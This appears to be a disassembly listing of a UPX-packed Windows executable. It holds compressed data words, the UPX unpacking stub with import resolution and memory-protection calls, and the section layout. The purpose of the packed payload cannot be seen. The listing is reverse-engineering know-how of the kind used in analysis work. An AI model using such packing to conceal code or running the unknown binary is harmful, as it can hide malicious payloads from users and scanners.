dd 620062Bh, 110F0D09h, 0F6EE231Eh, 1C11FFFFh, 120E2662h
dd 0F080619h, 0D08052Bh, 2F09310Ch, 0C1A4010h, 0FFFF032Ch
dd 0B78FFFFh, 290C6525h, 3C0E294Ch, 20133D05h, 19361608h
dd 344A0D0Bh, 11051606h, 0C511041h, 0BBBF7962h, 1170FEEDh
dd 10291055h, 753F2959h, 8191B56h, 13290541h, 0F7FF0528h
dd 150BEFFFh, 0E44001Ah, 32371A0Ah, 3D2F5A42h, 35013A32h
dd 10344B3Ah, 0FF6F2C08h, 490CB7B7h, 6381545h, 19101A19h
dd 2C13392Eh, 22371B65h, 0F6FB4E1Ah, 70CFEDFh, 34081306h
dd 0C370B0Ch, 5A61454Fh, 2F5A124Bh, 6E381E0Eh, 7B7F6DDFh
dd 21122728h, 3C361205h, 16588809h, 130A2864h, 3F893D2Ah
dd 0E17F7ECh, 0CC44841h, 91E1314h, 0DD455000h, 7FC87FDBh
dd 4014Ch, 46727C08h, 10200E0h, 0C08010Bh, 9EEBAF1Eh, 8E130C35h
dd 3100429h, 0C1660D30h, 0B40B396h, 7330402h, 0E92D9D9Bh
dd 101E600Ch, 0CBCB072Bh, 770625E2h, 203C3254h, 50241CB9h
dd 3F301D0h, 1CA71759h, 65742E1Eh, 0D85D7478h, 1D2B6C17h
dd 2304EB90h, 6DD60B20h, 722ECDDCh, 0CB612164h, 0DD23FB03h
dd 22EC2EEBh, 2E024027h, 0FE1C1026h, 29D816Eh, 2EC02773h
dd 6F6C6572h, 0EC192963h, 4F501259h, 6CFE0026h, 0AC1B42BFh
dd 2C4A2332h, 51h, 0
dd 0FF090000h, 3 dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_AC = byte ptr -0ACh
pusha
mov esi, offset dword_406000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_407232
; ---------------------------------------------------------------------------
align 8
loc_407228: ; CODE XREF: start:loc_407239�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_40722E: ; CODE XREF: start+B6�j start+CD�j
add ebx, ebx
jnz short loc_407239
loc_407232: ; CODE XREF: start+10�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407239: ; CODE XREF: start+20�j
jb short loc_407228
mov eax, 1
loc_407240: ; CODE XREF: start+3F�j start+4A�j
add ebx, ebx
jnz short loc_40724B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40724B: ; CODE XREF: start+32�j
adc eax, eax
add ebx, ebx
jnb short loc_407240
jnz short loc_40725C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_407240
loc_40725C: ; CODE XREF: start+41�j
xor ecx, ecx
sub eax, 3
jb short loc_407270
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_4072E2
mov ebp, eax
loc_407270: ; CODE XREF: start+51�j
add ebx, ebx
jnz short loc_40727B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40727B: ; CODE XREF: start+62�j
adc ecx, ecx
add ebx, ebx
jnz short loc_407288
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407288: ; CODE XREF: start+6F�j
adc ecx, ecx
jnz short loc_4072AC
inc ecx
loc_40728D: ; CODE XREF: start+8C�j start+97�j
add ebx, ebx
jnz short loc_407298
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407298: ; CODE XREF: start+7F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_40728D
jnz short loc_4072A9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40728D
loc_4072A9: ; CODE XREF: start+8E�j
add ecx, 2
loc_4072AC: ; CODE XREF: start+7A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_4072CC
loc_4072BD: ; CODE XREF: start+B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_4072BD
jmp loc_40722E
; ---------------------------------------------------------------------------
align 4
loc_4072CC: ; CODE XREF: start+AB�j start+C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_4072CC
add edi, ecx
jmp loc_40722E
; ---------------------------------------------------------------------------
loc_4072E2: ; CODE XREF: start+5C�j
pop esi
mov edi, esi
mov ecx, 0A3h
loc_4072EA: ; CODE XREF: start+E1�j start+E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_4072EF: ; CODE XREF: start+104�j
cmp al, 1
ja short loc_4072EA
cmp byte ptr [edi], 1
jnz short loc_4072EA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_4072EF
lea edi, [esi+5000h]
loc_40731C: ; CODE XREF: start+12E�j
mov eax, [edi]
or eax, eax
jz short loc_40735E
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+703Ch]
xchg eax, ebp
loc_407339: ; CODE XREF: start+146�j
mov al, [edi]
inc edi
or al, al
jz short loc_40731C
mov ecx, edi
push edi
dec eax
repne scasb
push ebp
call dword ptr [esi+7040h]
or eax, eax
jz short loc_407358
mov [ebx], eax
add ebx, 4
jmp short loc_407339
; ---------------------------------------------------------------------------
loc_407358: ; CODE XREF: start+13F�j
call dword ptr [esi+7048h]
loc_40735E: ; CODE XREF: start+110�j
add edi, 4
lea ebx, [esi-4]
loc_407364: ; CODE XREF: start+170�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_40738F
cmp al, 0EFh
ja short loc_407382
loc_407371: ; CODE XREF: start+17D�j
add ebx, eax
mov eax, [ebx]
xchg al, ah
rol eax, 10h
xchg al, ah
add eax, esi
mov [ebx], eax
jmp short loc_407364
; ---------------------------------------------------------------------------
loc_407382: ; CODE XREF: start+15F�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
jmp short loc_407371
; ---------------------------------------------------------------------------
loc_40738F: ; CODE XREF: start+15B�j
mov ebp, [esi+7044h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+1EFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp+2Ch+var_AC]
loc_4073C3: ; CODE XREF: start+1B7�j
push 0
cmp esp, eax
jnz short loc_4073C3
sub esp, 0FFFFFF80h
jmp sub_40298E
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 408000h
dd 3 dup(0)
dd 8058h, 803Ch, 3 dup(0)
dd 8065h, 8050h, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E6169Ah, 77E75CB5h, 0
aJW db 'jw',0
align 4
aKernel32_dll db 'KERNEL32.DLL',0
aUser32_dll db 'USER32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74726956h, 506C6175h, 65746F72h, 7463h
dd 74697845h, 636F7250h, 737365h, 73770000h, 6E697270h
dd 416674h, 7000h, 0Ch, 3212h, 3CFh dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 409000h
align 2000h
_idata2 ends
end start